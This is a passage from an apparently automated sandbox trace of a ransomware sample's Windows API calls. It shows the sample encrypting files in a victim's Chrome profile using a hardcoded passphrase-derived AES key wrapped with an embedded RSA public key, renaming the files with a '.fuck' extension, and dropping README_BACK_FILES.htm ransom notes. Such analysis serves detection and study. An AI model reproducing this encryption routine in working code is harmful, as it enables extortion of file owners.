worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt"), bFailIfExists=0) returned 1 [0265.187] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt", dwFileAttributes=0x0) returned 1 [0265.187] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.gsg")) returned 1 [0265.189] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.fuck")) returned 1 [0265.190] CryptDestroyHash (hHash=0x2e7ea00) returned 1 [0265.190] CryptDestroyKey (hKey=0x2e7ec80) returned 1 [0265.190] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.190] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0265.190] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0265.190] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\readme_back_files.htm")) returned 0xffffffff [0265.190] AreFileApisANSI () returned 1 [0265.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0265.191] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.192] GetFileType (hFile=0x5d4c) returned 0x1 [0265.192] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0265.193] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0265.193] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0265.193] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\readme_back_files.htm")) returned 0xffffffff [0265.193] AreFileApisANSI () returned 1 [0265.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 119 [0265.193] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.223] GetFileType (hFile=0x5d40) returned 0x1 [0265.223] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0265.224] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.224] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fbc0 [0265.229] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.229] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.229] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0265.229] GetLastError () returned 0x0 [0265.229] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\000003.log")) returned 0x20 [0265.230] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log", dwFileAttributes=0x80) returned 1 [0265.231] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.232] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\000003.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.233] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log.gsg", dwFileAttributes=0x2) returned 1 [0265.233] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e7a500) returned 1 [0265.235] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0265.235] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.235] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.235] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7ec80) returned 1 [0265.235] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.235] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0265.235] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e778e8) returned 1 [0265.236] CryptImportPublicKeyInfo (in: hCryptProv=0x2e778e8, dwCertEncodingType=0x1, pInfo=0x2eb1790*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb17c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb17c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7ecc0) returned 1 [0265.236] CryptEncrypt (in: hKey=0x2e7ecc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c70c*=0x80) returned 1 [0265.236] CryptEncrypt (in: hKey=0x2e7ecc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77860*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e77860*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0265.236] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e77860*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e77860*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0265.237] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.239] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.239] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.255] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.255] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.255] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.255] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x1b2, lpOverlapped=0x0) returned 1 [0265.255] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x1b2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x1c0) returned 1 [0265.255] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x1c0, lpOverlapped=0x0) returned 1 [0265.255] CloseHandle (hObject=0x5d4c) returned 1 [0265.255] CloseHandle (hObject=0x5d50) returned 1 [0265.256] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\000003.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\000003.log"), bFailIfExists=0) returned 1 [0265.263] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log", dwFileAttributes=0x0) returned 1 [0265.263] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\000003.log.gsg")) returned 1 [0265.265] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\000003.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\000003.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\000003.log.fuck")) returned 1 [0265.266] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0265.266] CryptDestroyKey (hKey=0x2e7ec80) returned 1 [0265.266] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.266] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.266] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.266] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.266] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.266] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0265.266] GetLastError () returned 0x0 [0265.266] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\log.old")) returned 0x20 [0265.267] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old", dwFileAttributes=0x80) returned 1 [0265.268] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\log.old"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.269] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\log.old.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.269] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old.gsg", dwFileAttributes=0x2) returned 1 [0265.270] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e7a500) returned 1 [0265.272] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0265.272] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.272] CryptHashData (hHash=0x2e7eb40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.272] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7eb40, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7f000) returned 1 [0265.272] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.272] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0265.272] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e77a80) returned 1 [0265.273] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77a80, dwCertEncodingType=0x1, pInfo=0x2eb04e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0510*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0518*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7eec0) returned 1 [0265.273] CryptEncrypt (in: hKey=0x2e7eec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c70c*=0x80) returned 1 [0265.273] CryptEncrypt (in: hKey=0x2e7eec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e779f8*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e779f8*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0265.273] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2e779f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e779f8*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0265.274] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x15e, lpOverlapped=0x0) returned 1 [0265.275] CryptEncrypt (in: hKey=0x2e7f000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x15e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x160) returned 1 [0265.275] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x160, lpOverlapped=0x0) returned 1 [0265.275] CloseHandle (hObject=0x5d50) returned 1 [0265.275] CloseHandle (hObject=0x5d4c) returned 1 [0265.275] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\log.old.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\log.old"), bFailIfExists=0) returned 1 [0265.292] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old", dwFileAttributes=0x0) returned 1 [0265.293] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\log.old.gsg")) returned 1 [0265.294] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\log.old"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\LOG.old.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\log.old.fuck")) returned 1 [0265.295] CryptDestroyHash (hHash=0x2e7eb40) returned 1 [0265.296] CryptDestroyKey (hKey=0x2e7f000) returned 1 [0265.296] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.296] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.296] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0265.296] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0265.296] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\readme_back_files.htm")) returned 0xffffffff [0265.296] AreFileApisANSI () returned 1 [0265.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0265.296] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.297] GetFileType (hFile=0x5d40) returned 0x1 [0265.297] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0265.298] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.298] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fbc0 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.306] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2e7fc00 [0265.316] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0265.316] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0265.316] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: 